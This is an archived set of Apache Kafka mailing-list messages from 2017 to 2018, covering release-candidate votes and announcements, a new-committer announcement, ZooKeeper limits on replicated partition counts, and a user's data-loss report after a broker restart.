> > but will allow better pipelining when accessing ZK.
> >
> > In the normal mode, we are now discussing KIP-227, which could reduce the
> > overhead for replication and consumption when there are many partitions.
> >
> > Jun
> >
> > On Wed, Jan 3, 2018 at 1:48 PM, Andrey Falko <afa...@salesforce.com>
> wrote:
> >
> >> Hi everyone,
> >>
> >> We are seeing more and more push from our Kafka users to support well
> >> more than 10k replicated partitions. We'd ideally like to avoid running
> >> multiple
> >> clusters to keep our cluster management and monitoring simple. We
> started
> >> testing kafka to see how many replicated partitions it could handle.
> >>
> >> We found that, to maintain SLAs of under 50ms for produce latency,
> >> Kafka starts going downhill at around 9k topics with 5 brokers. Each
> topic
> >> is
> >> replicated 3x in our test. The bottleneck appears to be zookeeper:
> >> after a certain
> >> period of time, the number of outstanding requests in ZK spikes up at a
> >> linear rate. Slowing down the rate at which we create and produce to
> >> topics,
> >> improves things, but doing that makes the system tougher to manage and
> use.
> >> We are happy to publish our detailed results with reproduction
> >> steps if anyone is interested.
> >>
> >> Has anyone overcome this problem and scaled beyond 9k replicated
> >> partitions?
> >> Does anyone have zookeeper tuning suggestions? Is it even the
> bottleneck?
> >>
> >> According to this we should have at most 300 3x-replicated partitions per broker:
> >> https://www.confluent.io/blog/how-to-choose-the-number-of-
> >> topicspartitions-in-a-kafka-cluster/
> >> Is anyone doing work to have kafka support more than that?
> >>
> >> Best regards,
> >> Andrey Falko
> >> Salesforce.com
> >>
>


Re: Kafka Replicated Partition Limits

2018-01-03 Thread Jun Rao
Hi, Andrey,

Thanks for reporting the results. Which version of Kafka are you testing?
Also, it would be useful to know if you are testing the normal mode when
all replicas are up and in sync, or the failure mode when some of the
replicas are being restarted. Typically, ZK is only accessed in the failure
mode.

We have made some significant improvement in the failure mode by reducing
the logging overhead (KAFKA-6116) and making the ZK accesses async
(KAFKA-5642). These won't necessarily reduce the number of requests to ZK,
but will allow better pipelining when accessing ZK.

In the normal mode, we are now discussing KIP-227, which could reduce the
overhead for replication and consumption when there are many partitions.

Jun

On Wed, Jan 3, 2018 at 1:48 PM, Andrey Falko  wrote:

> Hi everyone,
>
> We are seeing more and more push from our Kafka users to support well
> more than 10k replicated partitions. We'd ideally like to avoid running
> multiple
> clusters to keep our cluster management and monitoring simple. We started
> testing kafka to see how many replicated partitions it could handle.
>
> We found that, to maintain SLAs of under 50ms for produce latency,
> Kafka starts going downhill at around 9k topics with 5 brokers. Each topic
> is
> replicated 3x in our test. The bottleneck appears to be zookeeper:
> after a certain
> period of time, the number of outstanding requests in ZK spikes up at a
> linear rate. Slowing down the rate at which we create and produce to
> topics,
> improves things, but doing that makes the system tougher to manage and use.
> We are happy to publish our detailed results with reproduction
> steps if anyone is interested.
>
> Has anyone overcome this problem and scaled beyond 9k replicated
> partitions?
> Does anyone have zookeeper tuning suggestions? Is it even the bottleneck?
>
> According to this we should have at most 300 3x-replicated partitions per broker:
> https://www.confluent.io/blog/how-to-choose-the-number-of-
> topicspartitions-in-a-kafka-cluster/
> Is anyone doing work to have kafka support more than that?
>
> Best regards,
> Andrey Falko
> Salesforce.com
>


Re: [ANNOUNCE] New committer: Onur Karaman

2017-11-07 Thread Jun Rao
Affan,

All known problems in the controller are described in the doc linked from
https://issues.apache.org/jira/browse/KAFKA-5027.

Thanks,

Jun

On Mon, Nov 6, 2017 at 11:00 PM, Affan Syed <as...@an10.io> wrote:

> Congrats Onur,
>
> Can you also share the document where all known problems are listed; I am
> assuming these bugs are still valid for the current stable release.
>
> Affan
>
> - Affan
>
> On Mon, Nov 6, 2017 at 10:24 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Hi, everyone,
> >
> > The PMC of Apache Kafka is pleased to announce a new Kafka committer Onur
> > Karaman.
> >
> > Onur's most significant work is the improvement of the Kafka controller,
> which
> > is the brain of a Kafka cluster. Over time, we have accumulated quite a
> few
> > correctness and performance issues in the controller. There have been
> > attempts to fix controller issues in isolation, which would make the code
> > base more complicated without a clear path of solving all problems. Onur
> is
> > the one who took a holistic approach, by first documenting all known
> > issues, writing down a new design, coming up with a plan to deliver the
> > changes in phases and executing on it. At this point, Onur has completed
> > the two most important phases: making the controller single threaded and
> > changing the controller to use the async ZK api. The former fixed
> multiple
> > deadlocks and race conditions. The latter significantly improved the
> > performance when there are many partitions. Experimental results show
> that
> > Onur's work reduced the controlled shutdown time by a factor of 100
> > and the controller failover time by a factor of 3.
> >
> > Congratulations, Onur!
> >
> > Thanks,
> >
> > Jun (on behalf of the Apache Kafka PMC)
> >
>


[ANNOUNCE] New committer: Onur Karaman

2017-11-06 Thread Jun Rao
Hi, everyone,

The PMC of Apache Kafka is pleased to announce a new Kafka committer Onur
Karaman.

Onur's most significant work is the improvement of the Kafka controller, which
is the brain of a Kafka cluster. Over time, we have accumulated quite a few
correctness and performance issues in the controller. There have been
attempts to fix controller issues in isolation, which would make the code
base more complicated without a clear path of solving all problems. Onur is
the one who took a holistic approach, by first documenting all known
issues, writing down a new design, coming up with a plan to deliver the
changes in phases and executing on it. At this point, Onur has completed
the two most important phases: making the controller single threaded and
changing the controller to use the async ZK api. The former fixed multiple
deadlocks and race conditions. The latter significantly improved the
performance when there are many partitions. Experimental results show that
Onur's work reduced the controlled shutdown time by a factor of 100
and the controller failover time by a factor of 3.

Congratulations, Onur!

Thanks,

Jun (on behalf of the Apache Kafka PMC)


Re: [kafka-clients] [VOTE] 1.0.0 RC2

2017-10-18 Thread Jun Rao
Hi, Guozhang,

Thanks for running the release. Just a quick clarification. The statement
that "* Controller improvements: async ZK access for faster administrative
request handling" is not accurate. What's included in 1.0.0 is a logging
change improvement in the controller, which does give significant perf
benefit. However, the async ZK changes are in trunk and will be in 1.1.0.

Jun

On Tue, Oct 17, 2017 at 9:47 AM, Guozhang Wang  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the third candidate for release of Apache Kafka 1.0.0. The main
> PRs that got merged in after RC1 are the following:
>
> https://github.com/apache/kafka/commit/dc6bfa553e73ffccd1e604963e076c
> 78d8ddcd69
>
> It's worth noting that starting in this version we are using a different
> versioning scheme with three digits: *major.minor.bug-fix*
>
> Any and all testing is welcome, but the following areas are worth
> highlighting:
>
> 1. Client developers should verify that their clients can produce/consume
> to/from 1.0.0 brokers (ideally with compressed and uncompressed data).
> 2. Performance and stress testing. Heroku and LinkedIn have helped with
> this in the past (and issues have been found and fixed).
> 3. End users can verify that their apps work correctly with the new
> release.
>
> This is a major version release of Apache Kafka. It includes 29 new KIPs.
> See the release notes and release plan 
> (*https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=71764913
> *)
> for more details. A few feature highlights:
>
> * Java 9 support with significantly faster TLS and CRC32C implementations
> * JBOD improvements: disk failure only disables failed disk but not the
> broker (KIP-112/KIP-113)
> * Controller improvements: async ZK access for faster administrative
> request handling
> * Newly added metrics across all the modules (KIP-164, KIP-168, KIP-187,
> KIP-188, KIP-196)
> * Kafka Streams API improvements (KIP-120 / 130 / 138 / 150 / 160 / 161),
> and drop compatibility "Evolving" annotations
>
> Release notes for the 1.0.0 release:
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/RELEASE_NOTES.html
> *
>
>
>
> *** Please download, test and vote by Friday, October 20, 8pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/
> *
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> * Javadoc:
> *http://home.apache.org/~guozhang/kafka-1.0.0-rc2/javadoc/
> *
>
> * Tag to be voted upon (off 1.0 branch) is the 1.0.0-rc2 tag:
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 51d5f12e190a38547839c7d2710c97faaeaca586
>
> * Documentation:
> Note the documentation can't be pushed live due to changes that will not go
> live until the release. You can manually verify by downloading
> http://home.apache.org/~guozhang/kafka-1.0.0-rc2/
> kafka_2.11-1.0.0-site-docs.tgz
>
> * Successful Jenkins builds for the 1.0.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-1.0-jdk7/40/
> System test: https://jenkins.confluent.io/job/system-test-kafka-1.0/6/
>
>
> /**
>
>
> Thanks,
> -- Guozhang
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAHwHRrXD0nLUqFV0HV_Mtz5eY%
> 2B2RhXCSk_xX1FPkHV%3D0s6u7pQ%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>


Re: [kafka-clients] Re: [VOTE] 1.0.0 RC1

2017-10-16 Thread Jun Rao
Hi, Guozhang,

Onur found an existing performance bug in the controller when there are
lots of partitions. The fix is simple (
https://github.com/apache/kafka/pull/4075) and reduces the controlled
shutdown time from 6.5 mins to 30 secs, with
25K partitions, RF=2 and 5 brokers.

It would be useful to include this fix in 1.0.0.

Thanks,

Jun


On Mon, Oct 16, 2017 at 9:55 AM, Guozhang Wang  wrote:

> Hi Tom,
>
> Thanks for pointing it out. I meant to say Oct. 17th, Tuesday, for a 72
> hours period.
>
> That being said, we need to have a lazy majority to accept a release RC
> according to our bylaws (https://cwiki.apache.org/
> confluence/display/KAFKA/Bylaws). And if we cannot achieve that via
> thorough testing within the period we will automatically extend the voting
> process.
>
>
> Guozhang
>
>
>
> On Mon, Oct 16, 2017 at 5:09 AM, Thomas Crayford  > wrote:
>
>> Hi Guozhang,
>>
>> This says the due date on the testing is October 13th, which was the day
>> this email was sent. Is that accurate, or is it meant to read October
>> 17th,
>> which is next Tuesday?
>>
>> I feel like this short a testing window for a 1.0 RC is a little low, as
>> 1.0 is clearly a big announcement of stability, and folk should be given
>> enough time to do thorough testing.
>>
>> Thanks
>>
>> Tom
>>
>> On Fri, Oct 13, 2017 at 9:12 PM, Guozhang Wang 
>> wrote:
>>
>> > Hello Kafka users, developers and client-developers,
>> >
>> > This is the second candidate for release of Apache Kafka 1.0.0.
>> >
>> > It's worth noting that starting in this version we are using a different
>> > versioning scheme with three digits: *major.minor.bug-fix*
>> >
>> > Any and all testing is welcome, but the following areas are worth
>> > highlighting:
>> >
>> > 1. Client developers should verify that their clients can
>> produce/consume
>> > to/from 1.0.0 brokers (ideally with compressed and uncompressed data).
>> > 2. Performance and stress testing. Heroku and LinkedIn have helped with
>> > this in the past (and issues have been found and fixed).
>> > 3. End users can verify that their apps work correctly with the new
>> > release.
>> >
>> > This is a major version release of Apache Kafka. It includes 29 new
>> KIPs.
>> > See the release notes and release plan
>> > (*https://cwiki.apache.org/confluence/pages/viewpage.
>> > action?pageId=71764913
>> > > pageId=71764913
>> > >*)
>> > for more details. A few feature highlights:
>> >
>> > * Java 9 support with significantly faster TLS and CRC32C
>> implementations
>> > (KIP)
>> > * JBOD improvements: disk failure only disables failed disk but not the
>> > broker (KIP-112/KIP-113)
>> > * Newly added metrics across all the modules (KIP-164, KIP-168, KIP-187,
>> > KIP-188, KIP-196)
>> > * Kafka Streams API improvements (KIP-120 / 130 / 138 / 150 / 160 /
>> 161),
>> > and drop compatibility "Evolving" annotations
>> >
>> > Release notes for the 1.0.0 release:
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/RELEASE_NOTES.html
>> > *
>> >
>> >
>> >
>> > *** Please download, test and vote by Tuesday, October 13, 8pm PT
>> >
>> > Kafka's KEYS file containing PGP keys we use to sign the release:
>> > http://kafka.apache.org/KEYS
>> >
>> > * Release artifacts to be voted upon (source and binary):
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/
>> > *
>> >
>> > * Maven artifacts to be voted upon:
>> > https://repository.apache.org/content/groups/staging/org/apache/kafka/
>> >
>> > * Javadoc:
>> > *http://home.apache.org/~guozhang/kafka-1.0.0-rc1/javadoc/
>> > *
>> >
>> > * Tag to be voted upon (off 1.0 branch) is the 1.0.0-rc1 tag:
>> >
>> > https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
>> > 9424d29dbf0a3c538215b0b98b1e6b956481e4d5
>> >
>> > * Documentation:
>> > Note the documentation can't be pushed live due to changes that will
>> not go
>> > live until the release. You can manually verify by downloading
>> > http://home.apache.org/~guozhang/kafka-1.0.0-rc1/
>> > kafka_2.11-1.0.0-site-docs.tgz
>> >
>> > * Successful Jenkins builds for the 1.0.0 branch:
>> > Unit/integration tests: https://builds.apache.org/job/
>> kafka-1.0-jdk7/31/
>> > System test: https://jenkins.confluent.io/job/system-test-kafka-1.0/1/
>> >
>> >
>> > /**
>> >
>> >
>> > Thanks,
>> > -- Guozhang
>> >
>>
>
>
>
> --
> -- Guozhang
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at 

Re: [VOTE] 0.11.0.1 RC0

2017-09-11 Thread Jun Rao
Hi, Damian,

Thanks for running the release. Verified the quickstart from the src
distribution. +1

Jun

On Tue, Sep 5, 2017 at 1:34 PM, Damian Guy  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 0.11.0.1.
>
> This is a bug fix release and it includes fixes and improvements from 49
> JIRAs (including a few critical bugs).
>
> Release notes for the 0.11.0.1 release:
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by Saturday, September 9, 9am PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/javadoc/
>
> * Tag to be voted upon (off 0.11.0 branch) is the 0.11.0.1 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> a8aa61266aedcf62e45b3595a2cf68c819ca1a6c
>
>
> * Documentation:
> Note the documentation can't be pushed live due to changes that will not go
> live until the release. You can manually verify by downloading
> http://home.apache.org/~damianguy/kafka-0.11.0.1-rc0/
> kafka_2.11-0.11.0.1-site-docs.tgz
>
>
> * Protocol:
> http://kafka.apache.org/0110/protocol.html
>
> * Successful Jenkins builds for the 0.11.0 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.11.0-jdk7/298
>
> System tests:
> http://confluent-kafka-0-11-0-system-test-results.s3-us-
> west-2.amazonaws.com/2017-09-05--001.1504612096--apache--0.
> 11.0--7b6e5f9/report.html
>
> /**
>
> Thanks,
> Damian
>


Re: [ANNOUNCE] Apache Kafka 0.11.0.0 Released

2017-06-28 Thread Jun Rao
Hi, Ismael,

Thanks a lot for running this release!

Jun

On Wed, Jun 28, 2017 at 5:52 PM, Ismael Juma <ij...@apache.org> wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.11.0.0. This is a feature release which includes the completion
> of 32 KIPs, over 400 bug fixes and improvements, and more than 700 pull
> requests merged.
>
> All of the changes in this release can be found in the release notes:
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/RELEASE_NOTES.html
> (this is a link to a mirror due to temporary issues affecting
> archive.apache.org)
>
> Apache Kafka is a distributed streaming platform with five core APIs:
>
> ** The Producer API allows an application to publish a stream of records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output stream to one or more output topics, effectively transforming the
> input
> streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might capture
> every change to a table.
>
> ** The AdminClient API allows managing and inspecting topics, brokers, acls
> and other Kafka objects.
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react to
> the streams of data.
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka-0.11.0.0-src.tgz
>
> and binary releases from
> *https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.11-0.11.0.0.tgz
> <https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.11-0.11.0.0.tgz>*
>
> *https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.12-0.11.0.0.tgz
> <https://www.apache.org/dyn/closer.cgi?path=/kafka/0.11.0.
> 0/kafka_2.12-0.11.0.0.tgz>*
> Thanks to the 118 contributors on this release!
>
> Aaron Coburn, Adrian McCague, Aegeaner, Akash Sethi, Akhilesh Naidu, Alex
> Loddengaard, Allen Xiang, amethystic, Amit Daga, Andrew Olson, Andrey
> Dyachkov, anukin, Apurva Mehta, Armin Braun, Balint Molnar, Ben Stopford,
> Bernard Leach, Bharat Viswanadham, Bill Bejeck, Bruce Szalwinski, Chris
> Egerton, Christopher L. Shannon, Clemens Valiente, Colin P. Mccabe, Dale
> Peakall, Damian Guy, dan norwood, Dana Powers, Davor Poldrugo, dejan2609,
> Dhwani Katagade, Dong Lin, Dustin Cote, Edoardo Comar, Eno Thereska, Ewen
> Cheslack-Postava, gosubpl, Grant Henke, Guozhang Wang, Gwen Shapira,
> Hamidreza Afzali, Hao Chen, hejiefang, Hojjat Jafarpour, huxi, Ismael Juma,
> Ivan A. Melnikov, Jaikiran Pai, James Cheng, James Chien, Jan Lukavsky,
> Jason Gustafson, Jean-Philippe Daigle, Jeff Chao, Jeff Widman, Jeyhun
> Karimov, Jiangjie Qin, Jon Freedman, Jonathan Monette, Jorge Quilcate,
> jozi-k, Jun Rao, Kamal C, Kelvin Rutt, Kevin Sweeney, Konstantine
> Karantasis, Kyle Winkelman, Lihua Xin, Magnus Edenhill, Magnus Reftel,
> Manikumar Reddy O, Marco Ebert, Mario Molina, Matthias J. Sax, Maysam
> Yabandeh, Michael Andre Pearce, Michael G. Noll, Michal Borowiecki, Mickael
> Maison, Nick Pillitteri, Nikki Thean, Onur Karaman, Paolo Patierno,
> pengwei-li, Prabhat Kashyap, Qihuang Zheng, radai-rosenblatt, Raghav Kumar
> Gautam, Rajini Sivaram, Randall Hauch, Ryan P, Sachin Mittal, Sandesh K,
> Satish Duggana, Sean McCauliff, sharad-develop, Shikhar Bhushan, shuguo
> zheng, Shun Takebayashi, simplesteph, Steven Schlansker, Stevo Slavic,
> sunnykrgupta, Sönke Liebau, Tim Carey-Smith, Tom Bentley, Tommy Becker,
> Umesh Chaudhary, Vahid Hashemian, Vitaly Pushkar, Vogeti, Will Droste, Will
> Marshall, Wim Van Leuven, Xavier Léauté, Xi Hu, xinlihua, Yuto Kawamura
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ismael
>


Re: [kafka-clients] Re: [VOTE] 0.11.0.0 RC2

2017-06-26 Thread Jun Rao
Hi, Ismael,

Thanks for running the release. +1. Verified quickstart on the 2.11 binary.

Jun

On Mon, Jun 26, 2017 at 3:53 PM, Ismael Juma  wrote:

> Hi Vahid,
>
> There are a few known issues when running Kafka on Windows. A PR with some
> fixes is: https://github.com/apache/kafka/pull/3283. The fact that the
> index cannot be accessed indicates that it may be a similar issue. I
> suggest we move this discussion to the relevant JIRAs instead of the
> release thread.
>
> Ismael
>
> On Mon, Jun 26, 2017 at 11:25 PM, Vahid S Hashemian <
> vahidhashem...@us.ibm.com> wrote:
>
>> Hi Ismael,
>>
>> This is the output of core tests from the start until the first failed
>> test.
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWithRackAwareWithUnevenRacks
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWith2ReplicasRackAware
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWithRackAwareWithUnevenReplicas
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testSkipBrokerWithReplicaAlreadyAssigned
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testAssignmentWithRackAware PASSED
>>
>> kafka.admin.AdminRackAwareTest > testRackAwareExpansion PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWith2ReplicasRackAwareWith6Partitions
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest >
>> testAssignmentWith2ReplicasRackAwareWith6PartitionsAnd3Brokers PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testGetRackAlternatedBrokerListAndAssignReplicasToBrokers
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testMoreReplicasThanRacks PASSED
>>
>> kafka.admin.AdminRackAwareTest > testSingleRack PASSED
>>
>> kafka.admin.AdminRackAwareTest > 
>> testAssignmentWithRackAwareWithRandomStartIndex
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testLargeNumberPartitionsAssignment
>> PASSED
>>
>> kafka.admin.AdminRackAwareTest > testLessReplicasThanRacks PASSED
>>
>> kafka.admin.AclCommandTest > testInvalidAuthorizerProperty PASSED
>>
>> kafka.admin.ConfigCommandTest > testScramCredentials PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldParseArgumentsForTopicsEntityType
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > testUserClientQuotaOpts PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddTopicConfig PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddClientConfig PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldDeleteBrokerConfig PASSED
>>
>> kafka.admin.DeleteConsumerGroupTest > 
>> testGroupWideDeleteInZKDoesNothingForActiveConsumerGroup
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > testQuotaConfigEntity PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfMalformedBracketConfig
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldFailIfUnrecognisedEntityType PASSED
>>
>> kafka.admin.AdminTest > testBasicPreferredReplicaElection PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfNonExistingConfigIsDeleted
>> PASSED
>>
>> kafka.admin.AdminTest > testPreferredReplicaJsonData PASSED
>>
>> kafka.admin.BrokerApiVersionsCommandTest > checkBrokerApiVersionCommandOutput
>> PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldRemoveThrottleReplicaListBasedOnProposedAssignment PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultipleTopics PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldNotOverwriteExistingPropertiesWhenLimitIsAdded PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultipleTopicsAndPartitions PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldRemoveThrottleLimitFromAllBrokers PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldFindMovingReplicas
>> PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasMultiplePartitions PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldSetQuotaLimit PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindMovingReplicasWhenProposedIsSubsetOfExisting PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest > shouldUpdateQuotaLimit PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldFindTwoMovingReplicasInSamePartition PASSED
>>
>> kafka.admin.ReassignPartitionsCommandTest >
>> shouldNotOverwriteEntityConfigsWhenUpdatingThrottledReplicas PASSED
>>
>> kafka.admin.ConfigCommandTest > 
>> shouldNotUpdateBrokerConfigIfMalformedEntityName
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldSupportCommaSeparatedValues PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldNotUpdateBrokerConfigIfMalformedConfig
>> PASSED
>>
>> kafka.admin.DeleteConsumerGroupTest >
>> testGroupTopicWideDeleteInZKDoesNothingForActiveGroupConsumingMultipleTopics PASSED
>>
>> kafka.admin.AddPartitionsTest > testReplicaPlacementAllServers PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldParseArgumentsForBrokersEntityType
>> PASSED
>>
>> kafka.admin.ConfigCommandTest > shouldAddBrokerConfig PASSED
>>

Re: Data loss after a Kafka Broker restart scenario

2017-05-24 Thread Jun Rao
Hi, Fathima,

Yes, the most efficient way to verify if a message is sent successfully is
through the producer callback. You can take a look at PrintInfoCallback in
org.apache.kafka.tools.VerifiableProducer as an example. Our system tests
use that to verify if any data loss has occurred.
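
For readers who want to wire this up themselves, a minimal callback-based
sketch follows. The broker address, topic name "t", and String serializers
are placeholders for illustration, not details from this thread:

    import java.util.Properties;
    import org.apache.kafka.clients.producer.KafkaProducer;
    import org.apache.kafka.clients.producer.ProducerRecord;

    public class AckCheckingProducer {
        public static void main(String[] args) {
            Properties props = new Properties();
            props.put("bootstrap.servers", "localhost:9092"); // placeholder
            props.put("acks", "all"); // wait for all in-sync replicas
            props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
            props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");

            try (KafkaProducer<String, String> producer = new KafkaProducer<>(props)) {
                producer.send(new ProducerRecord<>("t", "key", "value"),
                    (metadata, exception) -> {
                        if (exception != null) {
                            // the record was not acked; treat it as potentially lost
                            System.err.println("Send failed: " + exception);
                        } else {
                            System.out.println("Acked at offset " + metadata.offset());
                        }
                    });
            } // close() flushes any buffered records before returning
        }
    }

Any exception handed to the callback means the write was not acknowledged,
which is essentially the signal the VerifiableProducer tool reports.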

Thanks,

Jun

On Mon, May 22, 2017 at 2:48 AM, Fathima Amara  wrote:

> Hi Jun,
>
> Do you mean by using the callback mechanism? Since I am new to Kafka, would you
> mind directing me how to do it if it's not to be done using a callback?
>
> Fathima.
>


Re: Data loss after a Kafka Broker restart scenario

2017-05-19 Thread Jun Rao
Hi, Fathima,

Did you check if produced messages are acked successfully? Only
successfully acked messages are guaranteed to be preserved on the broker.
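
A simpler, blocking way to check this is to wait on the Future returned by
send(): if get() returns, the broker acknowledged the write; if it throws,
the message may be lost. A sketch, where the topic name "t" and the helper
method itself are illustrative assumptions:

    import java.util.concurrent.ExecutionException;
    import org.apache.kafka.clients.producer.KafkaProducer;
    import org.apache.kafka.clients.producer.ProducerRecord;
    import org.apache.kafka.clients.producer.RecordMetadata;

    public class SyncAckCheck {
        // 'producer' is an already-configured producer; topic "t" is a placeholder
        static boolean sendAndConfirm(KafkaProducer<String, String> producer, String value) {
            try {
                // send() returns a Future<RecordMetadata>; get() blocks until the broker responds
                RecordMetadata md = producer.send(new ProducerRecord<>("t", value)).get();
                System.out.println("acked: partition=" + md.partition() + ", offset=" + md.offset());
                return true;
            } catch (InterruptedException | ExecutionException e) {
                // no ack: the message is not guaranteed to be preserved on the broker
                System.err.println("send failed: " + e);
                return false;
            }
        }
    }

Blocking on every record defeats batching, so this is better suited to
verification than to production use.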

Thanks,

Jun

On Thu, May 18, 2017 at 12:10 AM, Fathima Amara  wrote:

> Hi Jun,
>
> Thanks a lot for the reply. As suggested, I tried running my application on
> trunk. But I still encounter data loss! Are there any specific
> configs that I need to change from their default values? What could be the
> reason for this?
>
> Fathima
>


Re: Data loss after a Kafka Broker restart scenario

2017-05-16 Thread Jun Rao
Hi, Fathima,

There is a known data loss issue that's described in KIP-101 (
https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+use+Leader+Epoch+rather+than+High+Watermark+for+Truncation).
The issue happens rarely, but has been exposed in some of our system tests
that mimic the testing that you have been doing. KIP-101 has been fixed in
trunk and will be included in the next release (0.11.0.0) in June. Since
then, we haven't observed similar data loss issue in our system tests.

If you want to test this out now, perhaps you could rerun your test in
trunk.

Thanks,

Jun

On Tue, May 16, 2017 at 2:09 AM, Fathima Amara  wrote:

>
> Hi all,
>
> I am using Kafka 2.11-0.10.0.1 and Zookeeper 3.4.8.
> I have a cluster of 4 servers(A,B,C,D) running one kafka broker on each of
> them and, one zookeeper server on server A. Data is initially produced from
> server A using a Kafka Producer and it goes through servers B,C,D being
> subjected to processing and finally reaches server A again(gets consumed
> using a Kafka Consumer).
>
> Topics created at the end of each process have 2 partitions with a
> replication-factor of 3. Other configurations include:
> unclean.leader.election.enable=false
> acks=all
> retries=0
> I let the producer run for a while in server A, then kill one of the Kafka
> brokers on the cluster(B,C,D) while data processing takes place and restart
> it. When consuming from the end of server A, I notice a considerable amount
> of data lost, which varies on each run! E.g., on an input of 1 million events,
> 5930 events are lost.
>
> Is the reason for this the Kafka Producer not guaranteeing Exactly-once
> processing, or is this due to some other reason? What other reasons cause
> data loss?
>


Re: [VOTE] 0.10.2.1 RC3

2017-04-26 Thread Jun Rao
Hi, Gwen,

Thanks for doing the release. +1 from me.

Jun

On Fri, Apr 21, 2017 at 9:56 AM, Gwen Shapira  wrote:

> Hello Kafka users, developers, friends, romans, countrypersons,
>
> This is the fourth (!) candidate for release of Apache Kafka 0.10.2.1.
>
> It is a bug fix release, so we have lots of bug fixes, some super
> important.
>
> Release notes for the 0.10.2.1 release:
